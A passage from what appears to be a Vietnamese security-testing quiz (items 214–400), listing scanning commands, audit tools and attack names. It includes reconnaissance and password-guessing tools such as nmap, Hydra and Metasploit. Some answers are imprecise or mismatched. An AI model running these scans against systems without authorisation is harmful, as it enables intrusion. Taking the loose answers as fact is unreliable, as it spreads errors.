Hỏi: Tấn công nào khai thác việc không mã hóa dữ liệu trong quá trình truyền tải?
Đáp án: Man-in-the-Middle (MITM).
Câu 215:
Hỏi: Công cụ nào phù hợp để thực hiện reconnaissance qua giao thức SMB?
Đáp án: SMBClient hoặc Nmap với script smb-*
.
Câu 216:
Hỏi: Làm thế nào để phát hiện cấu hình firewall không đúng?
Đáp án: Chạy Nmap với các flag kiểm tra firewall như -sA
hoặc -Pn
.
Câu 217:
Hỏi: Công cụ nào được dùng để kiểm tra bảo mật ứng dụng IoT?
Đáp án: Shodan hoặc IoT Inspector.
Câu 218:
Hỏi: Làm thế nào để kiểm tra tính toàn vẹn của hệ thống tệp?
Đáp án: Dùng tripwire
hoặc aide
.
Câu 219:
Hỏi: Công cụ nào phù hợp để phân tích nhật ký hệ thống?
Đáp án: Splunk hoặc ELK Stack.
Câu 220:
Hỏi: Lệnh nào dùng để kiểm tra port TCP cụ thể đang mở?
Đáp án: nmap -p <port> <IP>
.
Câu 221:
Hỏi: Lệnh nào kiểm tra hệ điều hành đang chạy trên máy chủ?
Đáp án: nmap -O <IP>
.
Câu 222:
Hỏi: Công cụ nào tốt nhất để phát hiện mật khẩu mặc định trên thiết bị IoT?
Đáp án: Shodan hoặc Censys.
Câu 223:
Hỏi: Tấn công nào khai thác lỗ hổng CSRF?
Đáp án: Lừa người dùng thực hiện hành động không mong muốn trên trang web.
Câu 224:
Hỏi: Lệnh nào kiểm tra các bản ghi DNS TXT?
Đáp án: dig txt <domain>
.
Câu 225:
Hỏi: Làm thế nào để phát hiện lỗ hổng cấu hình trên dịch vụ NTP?
Đáp án: Chạy ntpq -p
để kiểm tra thông tin cấu hình.
Câu 226:
Hỏi: Công cụ nào được dùng để kiểm tra bảo mật ứng dụng qua REST API?
Đáp án: Postman hoặc Burp Suite.
Câu 227:
Hỏi: Phương pháp tốt nhất để kiểm tra mật khẩu được lưu trữ trên thiết bị di động?
Đáp án: Phân tích file keychain hoặc keystore.
Câu 228:
Hỏi: Làm thế nào để kiểm tra tính bảo mật của giao thức HTTPS?
Đáp án: Sử dụng SSL Labs hoặc OpenSSL.
Câu 229:
Hỏi: Công cụ nào phù hợp để kiểm tra bảo mật cho ứng dụng cloud?
Đáp án: ScoutSuite hoặc Prowler.
Câu 230:
Hỏi: Lệnh nào kiểm tra thông tin chi tiết về phiên bản dịch vụ trên một port?
Đáp án: nmap -sV -p <port> <IP>
.
Câu 231:
Hỏi: Công cụ nào được dùng để phát hiện các lỗ hổng trong ứng dụng PHP?
Đáp án: RIPS hoặc SonarQube.
Câu 232:
Hỏi: Tấn công nào khai thác việc không kiểm tra quyền truy cập?
Đáp án: Privilege Escalation.
Câu 233:
Hỏi: Lệnh nào kiểm tra firewall đang lọc các gói tin?
Đáp án: nmap -sA <IP>
.
Câu 234:
Hỏi: Làm thế nào để kiểm tra tính bảo mật của dịch vụ FTP?
Đáp án: Chạy kiểm tra với Nmap và script ftp-*
.
Câu 235:
Hỏi: Công cụ nào phù hợp để kiểm tra lỗ hổng ứng dụng container?
Đáp án: Aqua Trivy hoặc Clair.
Câu 236:
Hỏi: Lệnh nào kiểm tra thông tin routing trên hệ thống?
Đáp án: netstat -rn
hoặc ip route
.
Câu 237:
Hỏi: Công cụ nào được dùng để kiểm tra cấu hình bảo mật trên AWS?
Đáp án: ScoutSuite hoặc Prowler.
Câu 238:
Hỏi: Tấn công nào khai thác lỗ hổng liên quan đến file upload?
Đáp án: Arbitrary File Upload.
Câu 239:
Hỏi: Lệnh nào kiểm tra thông tin về cấu hình SNMP?
Đáp án: snmpwalk
hoặc snmp-check
.
Câu 240:
Hỏi: Công cụ nào phù hợp để phân tích các bản ghi log bảo mật?
Đáp án: Splunk hoặc ELK Stack.
Câu 241:
Hỏi: Lệnh nào kiểm tra thông tin kết nối TCP đang hoạt động?
Đáp án: netstat -an | grep ESTABLISHED
.
Câu 242:
Hỏi: Công cụ nào dùng để kiểm tra lưu lượng mạng đối với lỗ hổng ARP spoofing?
Đáp án: Ettercap hoặc Wireshark.
Câu 243:
Hỏi: Tấn công nào khai thác việc không xác thực session ID?
Đáp án: Session Hijacking.
Câu 244:
Hỏi: Công cụ nào phù hợp để kiểm tra cấu hình bảo mật trên Azure?
Đáp án: AzSK (Azure Security Kit).
Câu 245:
Hỏi: Lệnh nào kiểm tra các bản ghi SRV trên DNS?
Đáp án: dig srv <domain>
.
Câu 246:
Hỏi: Làm thế nào để kiểm tra bảo mật giao thức SMB trên Windows?
Đáp án: Chạy kiểm tra với Nmap và script smb-*
.
Câu 247:
Hỏi: Công cụ nào được dùng để phân tích lỗ hổng mạng không dây?
Đáp án: Aircrack-ng hoặc Kismet.
Câu 248:
Hỏi: Làm thế nào để phát hiện lỗ hổng trong cấu hình server Apache?
Đáp án: Sử dụng Nikto.
Câu 249:
Hỏi: Công cụ nào tốt nhất để kiểm tra lỗ hổng trong ứng dụng Node.js?
Đáp án: Snyk hoặc Retire.js.
Câu 250:
Hỏi: Lệnh nào kiểm tra tất cả các kết nối trên một hệ thống Linux?
Đáp án: netstat -tuln
.
Câu 251:
Hỏi: Công cụ nào được dùng để phát hiện lỗ hổng trong ứng dụng Python?
Đáp án: Bandit hoặc PyLint.
Câu 252:
Hỏi: Tấn công nào khai thác lỗi xử lý input trong JSON API?
Đáp án: JSON Injection.
Câu 253:
Hỏi: Công cụ nào phù hợp để kiểm tra bảo mật trên Kubernetes?
Đáp án: kube-bench hoặc kube-hunter.
Câu 254:
Hỏi: Làm thế nào để kiểm tra cấu hình tường lửa không đúng trên Linux?
Đáp án: Kiểm tra với iptables -L
hoặc ufw status
.
Câu 255:
Hỏi: Lệnh nào kiểm tra giao thức ICMP đang hoạt động trên hệ thống?
Đáp án: ping <IP>
hoặc traceroute <IP>
.
Câu 256:
Hỏi: Công cụ nào dùng để kiểm tra và khai thác lỗ hổng trên web?
Đáp án: Burp Suite hoặc OWASP ZAP.
Câu 257:
Hỏi: Lệnh nào kiểm tra trạng thái của các interface mạng trên Linux?
Đáp án: ifconfig
hoặc ip addr
.
Câu 258:
Hỏi: Công cụ nào phù hợp để kiểm tra tính bảo mật của ứng dụng container?
Đáp án: Aqua Trivy hoặc Clair.
Câu 259:
Hỏi: Tấn công nào khai thác lỗ hổng trong giao thức Telnet?
Đáp án: Credential Interception.
Câu 260:
Hỏi: Làm thế nào để kiểm tra xem một port UDP cụ thể có mở không?
Đáp án: nmap -sU -p <port> <IP>
.
Câu 261:
Hỏi: Lệnh nào kiểm tra hệ thống file đang sử dụng dung lượng lớn nhất?
Đáp án: df -h
hoặc du -sh /*
.
Câu 262:
Hỏi: Công cụ nào phù hợp để kiểm tra bảo mật mạng nội bộ?
Đáp án: Nmap hoặc Wireshark.
Câu 263:
Hỏi: Tấn công nào khai thác việc không kiểm tra cấu hình cross-origin?
Đáp án: Cross-Origin Resource Sharing (CORS) Misconfiguration.
Câu 264:
Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trong môi trường GCP?
Đáp án: GCP Forseti hoặc ScoutSuite.
Câu 265:
Hỏi: Lệnh nào kiểm tra tốc độ kết nối mạng?
Đáp án: iperf
hoặc speedtest-cli
.
Câu 266:
Hỏi: Làm thế nào để phát hiện lỗ hổng liên quan đến mật khẩu yếu trên SMB?
Đáp án: Sử dụng Hydra hoặc Medusa.
Câu 267:
Hỏi: Công cụ nào phân tích các gói tin độc hại?
Đáp án: Wireshark hoặc tcpdump.
Câu 268:
Hỏi: Tấn công nào khai thác lỗ hổng trong cấu hình API?
Đáp án: Broken Object Level Authorization (BOLA).
Câu 269:
Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trong môi trường container?
Đáp án: kube-bench hoặc Docker Bench for Security.
Câu 270:
Hỏi: Lệnh nào liệt kê tất cả các process đang chạy trên hệ thống?
Đáp án: ps aux
hoặc top
.
Câu 271:
Hỏi: Công cụ nào phù hợp để kiểm tra các dịch vụ nền tảng cloud?
Đáp án: ScoutSuite hoặc CloudSploit.
Câu 272:
Hỏi: Làm thế nào để kiểm tra trạng thái của các cổng mạng?
Đáp án: netstat -tuln
hoặc ss -tuln
.
Câu 273:
Hỏi: Công cụ nào phù hợp để kiểm tra các lỗ hổng ứng dụng web?
Đáp án: Nikto hoặc OWASP ZAP.
Câu 274:
Hỏi: Tấn công nào khai thác lỗ hổng upload path traversal?
Đáp án: Path Traversal.
Câu 275:
Hỏi: Làm thế nào để kiểm tra hệ thống có bị lỗi DNS cache poisoning?
Đáp án: Phân tích các bản ghi DNS thông qua Wireshark.
Câu 276:
Hỏi: Công cụ nào kiểm tra và quét các plugin WordPress?
Đáp án: WPScan.
Câu 277:
Hỏi: Lệnh nào kiểm tra nhật ký hệ thống trên Linux?
Đáp án: journalctl
hoặc cat /var/log/syslog
.
Câu 278:
Hỏi: Công cụ nào phù hợp để kiểm tra dịch vụ DNS?
Đáp án: dig hoặc nslookup.
Câu 279:
Hỏi: Làm thế nào để kiểm tra lỗ hổng trong giao thức HTTP?
Đáp án: Sử dụng Burp Suite hoặc Nikto.
Câu 280:
Hỏi: Tấn công nào khai thác lỗ hổng trong file cookie?
Đáp án: Cookie Poisoning.
Câu 281:
Hỏi: Công cụ nào phù hợp để phân tích mã độc trong file thực thi?
Đáp án: IDA Pro hoặc Ghidra.
Câu 282:
Hỏi: Lệnh nào hiển thị các kết nối mạng đang mở trên Windows?
Đáp án: netstat -an
.
Câu 283:
Hỏi: Tấn công nào khai thác việc không mã hóa mật khẩu trong API?
Đáp án: Credential Leakage.
Câu 284:
Hỏi: Công cụ nào phù hợp để kiểm tra lỗ hổng trong server email?
Đáp án: SMTPTester hoặc Nmap với script smtp-*
.
Câu 285:
Hỏi: Lệnh nào kiểm tra trạng thái kết nối của một cổng cụ thể?
Đáp án: telnet <IP> <port>
.
Câu 286:
Hỏi: Công cụ nào được dùng để phát hiện lỗ hổng cấu hình trên hệ thống Linux?
Đáp án: Lynis hoặc OpenSCAP.
Câu 287:
Hỏi: Tấn công nào khai thác việc không kiểm tra input trên web form?
Đáp án: SQL Injection.
Câu 288:
Hỏi: Làm thế nào để phát hiện lỗ hổng bảo mật trong tệp Dockerfile?
Đáp án: Sử dụng Hadolint hoặc Trivy.
Câu 289:
Hỏi: Công cụ nào phân tích và kiểm tra bảo mật hệ thống IoT?
Đáp án: IoT Inspector hoặc Shodan.
Câu 290:
Hỏi: Lệnh nào kiểm tra thông tin chi tiết của một package cài đặt trên Linux?
Đáp án: dpkg -s <package>
hoặc rpm -qi <package>
.
Câu 291:
Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trên AWS Lambda?
Đáp án: Prowler hoặc ScoutSuite.
Câu 292:
Hỏi: Làm thế nào để phát hiện lỗ hổng cấu hình trong file .htaccess
?
Đáp án: Sử dụng Nikto hoặc kiểm tra thủ công.
Câu 293:
Hỏi: Tấn công nào khai thác lỗi kiểm tra quyền truy cập trong ứng dụng?
Đáp án: Broken Access Control.
Câu 294:
Hỏi: Công cụ nào phù hợp để quét lỗ hổng trên các thiết bị IoT?
Đáp án: Nessus hoặc Shodan.
Câu 295:
Hỏi: Lệnh nào kiểm tra trạng thái của các dịch vụ trên Linux?
Đáp án: systemctl status
hoặc service --status-all
.
Câu 296:
Hỏi: Công cụ nào được dùng để kiểm tra các lỗ hổng trong ứng dụng Ruby?
Đáp án: Brakeman.
Câu 297:
Hỏi: Tấn công nào khai thác việc lưu thông tin nhạy cảm trong cache?
Đáp án: Cache Poisoning.
Câu 298:
Hỏi: Làm thế nào để kiểm tra dịch vụ DHCP trên mạng?
Đáp án: Sử dụng dhclient
hoặc dhcpdump
.
Câu 299:
Hỏi: Công cụ nào phân tích lưu lượng mạng để phát hiện mã độc?
Đáp án: Wireshark hoặc Zeek.
Câu 300:
Hỏi: Lệnh nào kiểm tra trạng thái file system trên Linux?
Đáp án: fsck
hoặc mount
.
Câu 301:
Hỏi: Công cụ nào phù hợp để phát hiện các lỗ hổng trên website?
Đáp án: OWASP ZAP hoặc Burp Suite.
Câu 302:
Hỏi: Lệnh nào hiển thị danh sách các group của người dùng hiện tại trên Linux?
Đáp án: groups
hoặc id -Gn
.
Câu 303:
Hỏi: Tấn công nào khai thác việc không kiểm tra độ dài input?
Đáp án: Buffer Overflow.
Câu 304:
Hỏi: Công cụ nào kiểm tra và phát hiện cấu hình yếu trên dịch vụ FTP?
Đáp án: Nmap với script ftp-*
hoặc Nikto.
Câu 305:
Hỏi: Lệnh nào kiểm tra version của Apache đang chạy trên server?
Đáp án: apache2 -v
hoặc httpd -v
.
Câu 306:
Hỏi: Công cụ nào phân tích và kiểm tra bảo mật ứng dụng Java?
Đáp án: FindSecBugs hoặc OWASP Dependency-Check.
Câu 307:
Hỏi: Làm thế nào để kiểm tra trạng thái của CPU trên Linux?
Đáp án: top
, htop
, hoặc cat /proc/cpuinfo
.
Câu 308:
Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trên dịch vụ email?
Đáp án: SMTPTester hoặc MxToolbox.
Câu 309:
Hỏi: Tấn công nào khai thác lỗ hổng trong giao thức HTTPS?
Đáp án: SSL Stripping.
Câu 310:
Hỏi: Công cụ nào phù hợp để quét lỗ hổng trên hệ thống SCADA?
Đáp án: OpenVAS hoặc Nessus.
Câu 311:
Hỏi: Lệnh nào kiểm tra các module đang chạy trên kernel Linux?
Đáp án: lsmod
hoặc modinfo
.
Câu 312:
Hỏi: Công cụ nào dùng để kiểm tra và khai thác lỗ hổng SMB?
Đáp án: Metasploit hoặc SMBClient.
Câu 313:
Hỏi: Làm thế nào để phát hiện lỗ hổng liên quan đến session ID?
Đáp án: Sử dụng Burp Suite hoặc OWASP ZAP.
Câu 314:
Hỏi: Công cụ nào phân tích và kiểm tra bảo mật trong môi trường Docker?
Đáp án: Docker Bench for Security hoặc Trivy.
Câu 315:
Hỏi: Lệnh nào kiểm tra trạng thái của các file hệ thống trên Linux?
Đáp án: df -h
hoặc lsblk
.
Câu 316:
Hỏi: Tấn công nào khai thác lỗi cấu hình không đúng trên DNS?
Đáp án: DNS Zone Transfer Attack.
Câu 317:
Hỏi: Công cụ nào dùng để phát hiện lỗ hổng trong hệ thống Windows?
Đáp án: Nessus hoặc Metasploit.
Câu 318:
Hỏi: Làm thế nào để kiểm tra trạng thái RAM trên Linux?
Đáp án: free -h
hoặc vmstat
.
Câu 319:
Hỏi: Công cụ nào kiểm tra bảo mật ứng dụng dựa trên framework Ruby on Rails?
Đáp án: Brakeman.
Câu 320:
Hỏi: Lệnh nào kiểm tra quyền truy cập file trên Linux?
Đáp án: ls -l
hoặc stat <file>
.
Câu 321:
Hỏi: Công cụ nào phân tích và kiểm tra bảo mật ứng dụng Python?
Đáp án: Bandit hoặc PyLint.
Câu 322:
Hỏi: Lệnh nào kiểm tra thời gian hoạt động của hệ thống trên Linux?
Đáp án: uptime
.
Câu 323:
Hỏi: Tấn công nào khai thác lỗ hổng liên quan đến API rate-limiting?
Đáp án: API Abuse.
Câu 324:
Hỏi: Công cụ nào kiểm tra và phát hiện lỗ hổng trong ứng dụng PHP?
Đáp án: RIPS hoặc SonarQube.
Câu 325:
Hỏi: Lệnh nào kiểm tra dung lượng ổ đĩa trên Linux?
Đáp án: df -h
.
Câu 326:
Hỏi: Làm thế nào để phát hiện lỗ hổng trên các plugin WordPress?
Đáp án: Sử dụng WPScan.
Câu 327:
Hỏi: Công cụ nào phân tích và kiểm tra bảo mật mã nguồn ứng dụng?
Đáp án: SonarQube hoặc Checkmarx.
Câu 328:
Hỏi: Làm thế nào để kiểm tra lỗ hổng liên quan đến TLS?
Đáp án: SSL Labs hoặc testssl.sh.
Câu 329:
Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trên dịch vụ cloud?
Đáp án: ScoutSuite hoặc Prowler.
Câu 330:
Hỏi: Tấn công nào khai thác việc không mã hóa thông tin trong cookies?
Đáp án: Cookie Hijacking.
Câu 331:
Hỏi: Lệnh nào kiểm tra cấu hình firewall trên Linux?
Đáp án: iptables -L
hoặc ufw status
.
Câu 332:
Hỏi: Công cụ nào phù hợp để kiểm tra lỗ hổng trong container images?
Đáp án: Trivy hoặc Clair.
Câu 333:
Hỏi: Làm thế nào để kiểm tra cấu hình DNS bị lỗi?
Đáp án: Sử dụng dig hoặc nslookup.
Câu 334:
Hỏi: Tấn công nào khai thác lỗ hổng lưu mật khẩu trong file config?
Đáp án: Credential Disclosure.
Câu 335:
Hỏi: Công cụ nào dùng để kiểm tra cấu hình bảo mật trong Azure?
Đáp án: AzSK hoặc ScoutSuite.
Câu 336:
Hỏi: Lệnh nào kiểm tra trạng thái của các tiến trình chạy nền trên Linux?
Đáp án: ps aux
hoặc top
.
Câu 337:
Hỏi: Công cụ nào dùng để phân tích lưu lượng DNS trên mạng?
Đáp án: Wireshark hoặc Zeek.
Câu 338:
Hỏi: Tấn công nào khai thác lỗi input trong JSON-based APIs?
Đáp án: JSON Injection.
Câu 339:
Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trên môi trường Kubernetes?
Đáp án: kube-bench hoặc kube-hunter.
Câu 340:
Hỏi: Lệnh nào kiểm tra lịch sử các lệnh đã thực hiện trên Linux?
Đáp án: history
.
Câu 341:
Hỏi: Công cụ nào được sử dụng để kiểm tra bảo mật cho ứng dụng JavaScript?
Đáp án: Retire.js hoặc Snyk.
Câu 342:
Hỏi: Lệnh nào hiển thị thời gian hiện tại của hệ thống trên Linux?
Đáp án: date
.
Câu 343:
Hỏi: Tấn công nào khai thác việc không giới hạn số lần thử đăng nhập?
Đáp án: Brute Force Attack.
Câu 344:
Hỏi: Công cụ nào kiểm tra lỗ hổng trong mã nguồn Ruby?
Đáp án: Brakeman.
Câu 345:
Hỏi: Lệnh nào kiểm tra tài nguyên mạng sử dụng trên Linux?
Đáp án: iftop
hoặc nload
.
Câu 346:
Hỏi: Làm thế nào để phát hiện lỗ hổng SQL Injection?
Đáp án: Sử dụng SQLmap hoặc Burp Suite.
Câu 347:
Hỏi: Công cụ nào phân tích và kiểm tra cấu hình bảo mật của TLS/SSL?
Đáp án: SSL Labs hoặc testssl.sh.
Câu 348:
Hỏi: Làm thế nào để kiểm tra trạng thái của swap memory trên Linux?
Đáp án: free -h
hoặc swapon -s
.
Câu 349:
Hỏi: Công cụ nào kiểm tra và phân tích lưu lượng FTP?
Đáp án: Wireshark hoặc tcpdump.
Câu 350:
Hỏi: Tấn công nào khai thác lỗi xử lý session expiration?
Đáp án: Session Fixation.
Câu 351:
Hỏi: Lệnh nào kiểm tra trạng thái mount các hệ thống file?
Đáp án: mount
hoặc df -h
.
Câu 352:
Hỏi: Công cụ nào phân tích và kiểm tra bảo mật hệ thống cloud?
Đáp án: ScoutSuite hoặc Prowler.
Câu 353:
Hỏi: Làm thế nào để kiểm tra dịch vụ SSH có được cấu hình bảo mật?
Đáp án: Chạy ssh-audit
.
Câu 354:
Hỏi: Công cụ nào kiểm tra và phát hiện lỗ hổng trong ứng dụng container?
Đáp án: Trivy hoặc Aqua.
Câu 355:
Hỏi: Lệnh nào kiểm tra danh sách các cổng đang mở trên Windows?
Đáp án: netstat -an
.
Câu 356:
Hỏi: Tấn công nào khai thác lỗ hổng Cross-Origin Resource Sharing (CORS)?
Đáp án: CORS Misconfiguration Attack.
Câu 357:
Hỏi: Công cụ nào kiểm tra các lỗ hổng trong file .env
?
Đáp án: GitLeaks hoặc truffleHog.
Câu 358:
Hỏi: Lệnh nào kiểm tra trạng thái của tiến trình trên hệ thống Linux?
Đáp án: ps aux
hoặc top
.
Câu 359:
Hỏi: Công cụ nào phân tích và kiểm tra bảo mật giao thức DNS?
Đáp án: Wireshark hoặc dnstracer.
Câu 360:
Hỏi: Làm thế nào để phát hiện lỗi input validation trong JSON API?
Đáp án: Sử dụng Burp Suite hoặc Postman.
Câu 361:
Hỏi: Công cụ nào được dùng để kiểm tra bảo mật cho ứng dụng React?
Đáp án: Snyk hoặc Retire.js.
Câu 362:
Hỏi: Lệnh nào hiển thị các user hiện đang đăng nhập vào hệ thống?
Đáp án: who
hoặc w
.
Câu 363:
Hỏi: Tấn công nào khai thác lỗ hổng trong JSON Web Token (JWT)?
Đáp án: JWT Manipulation Attack.
Câu 364:
Hỏi: Công cụ nào phân tích và kiểm tra cấu hình bảo mật cho REST API?
Đáp án: Postman hoặc OWASP ZAP.
Câu 365:
Hỏi: Lệnh nào kiểm tra trạng thái của hệ thống log trên Linux?
Đáp án: journalctl
hoặc cat /var/log/syslog
.
Câu 366:
Hỏi: Làm thế nào để phát hiện lỗ hổng XSS trong ứng dụng web?
Đáp án: Sử dụng Burp Suite hoặc OWASP ZAP.
Câu 367:
Hỏi: Công cụ nào kiểm tra và phân tích bảo mật giao thức HTTP?
Đáp án: Burp Suite hoặc Nikto.
Câu 368:
Hỏi: Lệnh nào hiển thị thông tin phiên bản kernel trên Linux?
Đáp án: uname -r
.
Câu 369:
Hỏi: Công cụ nào được dùng để phân tích lưu lượng mạng HTTPS?
Đáp án: Wireshark với private key hoặc Burp Suite.
Câu 370:
Hỏi: Tấn công nào khai thác lỗi không mã hóa thông tin nhạy cảm?
Đáp án: Data Exposure Attack.
Câu 371:
Hỏi: Lệnh nào kiểm tra trạng thái của các cổng UDP trên hệ thống?
Đáp án: netstat -u
hoặc ss -u
.
Câu 372:
Hỏi: Công cụ nào phân tích và kiểm tra lỗ hổng giao thức Telnet?
Đáp án: Nmap với script telnet-*
hoặc Metasploit.
Câu 373:
Hỏi: Làm thế nào để phát hiện lỗi input validation trong file upload?
Đáp án: Sử dụng Burp Suite hoặc kiểm tra thủ công.
Câu 374:
Hỏi: Công cụ nào kiểm tra và phát hiện lỗ hổng dịch vụ cloud?
Đáp án: ScoutSuite hoặc Prowler.
Câu 375:
Hỏi: Lệnh nào hiển thị danh sách các nhóm người dùng trên Linux?
Đáp án: cat /etc/group
.
Câu 376:
Hỏi: Tấn công nào khai thác lỗ hổng cấu hình trên giao thức LDAP?
Đáp án: LDAP Injection.
Câu 377:
Hỏi: Công cụ nào được dùng để kiểm tra bảo mật dịch vụ Kubernetes?
Đáp án: kube-bench hoặc kube-hunter.
Câu 378:
Hỏi: Lệnh nào kiểm tra tốc độ xử lý của hệ thống trên Linux?
Đáp án: uptime
hoặc vmstat
.
Câu 379:
Hỏi: Công cụ nào phân tích và kiểm tra lỗ hổng giao thức SMB?
Đáp án: SMBClient hoặc Metasploit.
Câu 380:
Hỏi: Làm thế nào để phát hiện các bản ghi DNS không hợp lệ?
Đáp án: Sử dụng dig hoặc kiểm tra thủ công với nslookup.
Câu 381:
Hỏi: Công cụ nào phù hợp để kiểm tra bảo mật cho ứng dụng Angular?
Đáp án: Snyk hoặc Retire.js.
Câu 382:
Hỏi: Lệnh nào hiển thị danh sách các user trên hệ thống Linux?
Đáp án: cat /etc/passwd
.
Câu 383:
Hỏi: Tấn công nào khai thác việc không bảo vệ mã thông báo xác thực?
Đáp án: Token Theft Attack.
Câu 384:
Hỏi: Công cụ nào kiểm tra bảo mật và phân tích ứng dụng Node.js?
Đáp án: Snyk hoặc Retire.js.
Câu 385:
Hỏi: Lệnh nào kiểm tra dung lượng RAM vật lý trên Linux?
Đáp án: free -h
hoặc cat /proc/meminfo
.
Câu 386:
Hỏi: Làm thế nào để phát hiện lỗ hổng Command Injection?
Đáp án: Sử dụng Burp Suite hoặc kiểm tra thủ công.
Câu 387:
Hỏi: Công cụ nào phân tích và kiểm tra lỗ hổng trong giao thức SMTP?
Đáp án: Nmap với script smtp-*
hoặc Metasploit.
Câu 388:
Hỏi: Lệnh nào hiển thị thông tin về tất cả các interface mạng trên Linux?
Đáp án: ifconfig
hoặc ip addr
.
Câu 389:
Hỏi: Công cụ nào kiểm tra lưu lượng HTTPS để phát hiện mã độc?
Đáp án: Wireshark hoặc Burp Suite.
Câu 390:
Hỏi: Tấn công nào khai thác việc không mã hóa thông tin trong URL?
Đáp án: URL Parameter Tampering.
Câu 391:
Hỏi: Lệnh nào kiểm tra tất cả các tiến trình đang mở trên hệ thống?
Đáp án: ps aux
hoặc top
.
Câu 392:
Hỏi: Công cụ nào kiểm tra và phân tích bảo mật giao thức FTP?
Đáp án: Wireshark hoặc Nmap với script ftp-*
.
Câu 393:
Hỏi: Làm thế nào để phát hiện lỗi input validation trong REST API?
Đáp án: Sử dụng Postman hoặc Burp Suite.
Câu 394:
Hỏi: Công cụ nào phân tích và kiểm tra bảo mật ứng dụng container?
Đáp án: Aqua Trivy hoặc Docker Bench for Security.
Câu 395:
Hỏi: Lệnh nào hiển thị thông tin routing trên Linux?
Đáp án: route -n
hoặc ip route
.
Câu 396:
Hỏi: Tấn công nào khai thác việc lưu trữ dữ liệu nhạy cảm không được mã hóa?
Đáp án: Sensitive Data Exposure.
Câu 397:
Hỏi: Công cụ nào kiểm tra cấu hình bảo mật trong môi trường cloud?
Đáp án: ScoutSuite hoặc Prowler.
Câu 398:
Hỏi: Lệnh nào kiểm tra trạng thái của các dịch vụ trên Windows?
Đáp án: sc query
hoặc Get-Service
(trên PowerShell).
Câu 399:
Hỏi: Công cụ nào phân tích và kiểm tra cấu hình DNS?
Đáp án: dig hoặc nslookup.
Câu 400:
Hỏi: Làm thế nào để phát hiện lỗi bảo mật trong file cấu hình ứng dụng?
Đáp án: Sử dụng kiểm tra thủ công hoặc công cụ như Trivy.